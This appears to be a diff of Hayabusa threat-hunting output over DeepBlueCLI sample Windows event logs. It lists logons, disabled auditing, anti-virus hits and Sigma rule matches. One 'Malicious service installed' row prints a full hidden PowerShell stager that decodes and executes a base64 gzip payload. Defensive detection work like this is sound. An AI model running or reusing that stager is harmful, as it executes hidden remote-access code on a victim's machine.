+2016-08-18 23:47:38.430 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$  :  Target User: IEUser  :  IP Address: 127.0.0.1  :  Process: C:\Windows\System32\winlogon.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-18 23:47:38.430 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE10WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x1dc1e  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-18 23:47:38.430 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE10WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x1ee41  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-18 23:47:38.430 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser  :  LogonID: 0x1dc1e,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-18 23:48:31.289 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser  :  LogonID: 0x1ee41,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-18 23:49:38.281 +09:00,IE10Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-18 23:49:39.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2016-08-18 23:49:39.844 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-18 23:49:39.844 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-18 23:49:40.000 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$  :  Target User: IEUser  :  IP Address: 127.0.0.1  :  Process: C:\Windows\System32\winlogon.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-18 23:49:40.000 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE10WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x1b293  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-18 23:49:40.000 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE10WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x1b2fd  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-18 23:49:40.000 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser  :  LogonID: 0x1b293,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-18 23:51:41.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2016-08-18 23:51:41.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2016-08-18 23:52:55.692 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-18 23:52:55.692 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 00:28:28.043 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser  :  LogonID: 0x1b2fd,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 00:29:27.609 +09:00,IE10Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 00:29:28.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2016-08-19 00:29:29.859 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$  :  Target User: IEUser  :  IP Address: 127.0.0.1  :  Process: C:\Windows\System32\winlogon.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 00:29:29.859 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE10WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x1aae1  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 00:29:29.859 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE10WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x1af2f  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 00:29:29.859 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser  :  LogonID: 0x1aae1,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 00:31:31.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2016-08-19 00:31:31.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 01:24:07.515 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:24:07.515 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:24:10.343 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:24:10.343 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:52:58.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2016-08-19 01:52:59.704 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:52:59.704 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:55:00.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2016-08-19 01:55:00.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2016-08-19 02:39:39.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2016-08-19 02:39:39.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2016-08-19 03:46:19.937 +09:00,IE10Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 03:46:20.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2016-08-19 03:57:18.515 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 03:57:18.515 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 03:57:20.937 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 03:57:20.937 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 04:55:50.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2016-08-19 04:55:51.755 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 04:55:51.755 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 04:57:52.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2016-08-19 04:57:52.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2016-08-19 05:40:21.230 +09:00,IE10Win7,7045,high,Malicious service installed,"Service: SYyGmEHvgHiGYApk  :  Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIADQdtlcCA7VWa2/aSBT93Er9D1aFZFslGAhtmkiVdszLhEcA82ZRNdhjM2TsIfY4PLr973sNdkK3zSpdaS2Q53HvzJlzz51rJ/ItQbkv7a3lQPr27u2bLg6wJykZ52s1K2UeREl98waGM65/27wla3PApC+SMkebTYV7mPqLm5tyFATEF6d+rk4ECkPiLRkloaJKf0njFQnIxd1yTSwhfZMyX3N1xpeYJWb7MrZWRLpAvh3PtbiFY0g5c8OoUOQ//5TV+UVhkas+RJiFimzuQ0G8nM2YrErf1XjDwX5DFLlNrYCH3BG5MfUvi7mhH2KHdGC1R9ImYsXtUFbhLPALiIgCXzo7VbzMyUiRodkNuIVsOyAh+OQa/iO/J0rGjxjLSn8o8wRDP/IF9QjMCxLwjUmCR2qRMGdg32akT5yF0iHb9OivdVLOncCqKwI1CyF5EWyb2xEjJ39Z/RluHEwVniSgwMH3d2/fvXXS4K8HpD3c4fP4Q+vN/NgmgFLp8pAeTb9I+azUhp2w4MEeuplBEBF1Ic3jGMwXCykTcee6M9GzLy9RSO3Bmn7UYWQ+4tRegEcSn4zX/WrcGUPK67NCPP+y3irEoT6p7H3sUSuVlPIr3onDyPHAudSsA9gUOZkgdoUw4mIRc5iV5j+7VT0qnnz1iDKbBMiC2IWACsKq/gjmFBZFbvht4gFbp74MUXBAyCS1TsS7T3eP+2AklxkOw6zUjSCTrKxkEsyInZWQH9JkCkWCH5vyM9x2xAS1cCjS5RbqP/lM9i1zPxRBZEEggYOBuSEWxSymJCsZ1Cb63qRuur/8S0LKmDHqu7DSIwQERmIiTBHLIwCoqRTUnElEw9sw4oHZMbtrDLuQy0kuHCWFXWLLL4FN1X6SdkxPyssZVIi5ybjISiMaCLgsYqpBX/8ZyNlF8QOkckCSOClpLs31vYjln9mutlbHEK1YtAlhR3oCAdTUAu7pOCSfSqYIgDjlvXZHywieacNnbUu/pwW0pYVGG/5DetnglSu7ebs2tKCyWzmoETbaRrfSM4zS4605Kgmz2hDNbkO0q5P12kRGfzgVswYyBjR/Py0dNrf0YLaQPd1pnw76YZvXd4e1azvTiuO4V47ZL3ys0da43NPzRdyqVKPWWN/q+VJYpVujR4e9+9uaWE5HDA8dzZ0UrjHdtYL1qMDbhwZC9dWldbh1RvVV295PDe16XLpHVYTKfnVU03lzqgeoq42wO+Lb5rrOxm4Z6TWLkllvWNN7vZqOhvX1Q+Vac8F3glf6eFSks82kv4J+DSA0tXypYZMDn/aApDpH2O2DjVsuWisHbCofkP6hw8Mivtc50sGmNnsAXNNNrctgfjAscjRinQlGrdm+pmmFabeEjDwd110UL4ldvYdR+Fg5VLTCyOb2+GNn6mijCbvSKuXBxnI0TdsalaY1K+w+312V9PxD2aMeWxZt7Xr4Wfe3Tbf76Nq98VV/19kvYb+hpo3ex/oBAWWW1+tJy/3kn+nhpQLQxkG4wgx0And6mr41HtSSe7rLaeyhKMdifU8CnzAoc1AIU8EjxrgV14r0RodSdSogC8jfITQvi79sqdKTofpcQNKhm5sZAIU0SsWdaxHfFatsfneZz0NByO9KeTjw6w9Y5pu98rRcNi4qT0yd78OO+6hxhmUObPbZ6+/+XyKT1F7By34Fkc9j/zL7KnLz2WcCfpr6ceC3mP5tBsaYCrA04Xpi5FRBXyQiEc/ZJ0cSJFCGkzzxF+BdJC468DHyN6LCQgBvCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 07:54:48.533 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 07:54:48.533 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 11:07:47.443 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 11:07:47.443 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 11:19:46.459 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 11:19:46.459 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 22:57:54.520 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 22:57:54.520 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-20 05:09:55.515 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-20 05:09:55.515 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-20 05:09:57.843 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-20 05:09:57.843 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-20 05:47:29.854 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-20 05:47:29.854 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-20 06:47:30.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-20 06:47:30.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-20 08:02:19.515 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-20 08:02:19.515 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-20 08:02:22.296 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-20 08:02:22.296 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-21 01:03:05.348 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-21 01:03:05.348 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-21 05:05:57.517 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-21 05:05:57.517 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-21 05:05:59.973 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-21 05:05:59.973 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-22 06:00:11.001 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-22 06:00:11.001 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-22 06:03:27.106 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-22 06:03:27.106 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-22 06:42:09.518 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-22 06:42:09.518 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-22 06:45:28.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2016-08-22 06:47:30.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2016-08-22 06:47:30.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2016-08-23 09:12:59.515 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-23 09:12:59.515 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-23 09:13:02.546 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-23 09:13:02.546 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-23 11:24:05.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-23 11:24:05.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-25 06:17:07.515 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-25 06:17:07.515 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-25 06:17:10.203 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-25 06:17:10.203 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-25 06:25:05.171 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 06:25:59.734 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 06:26:37.046 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
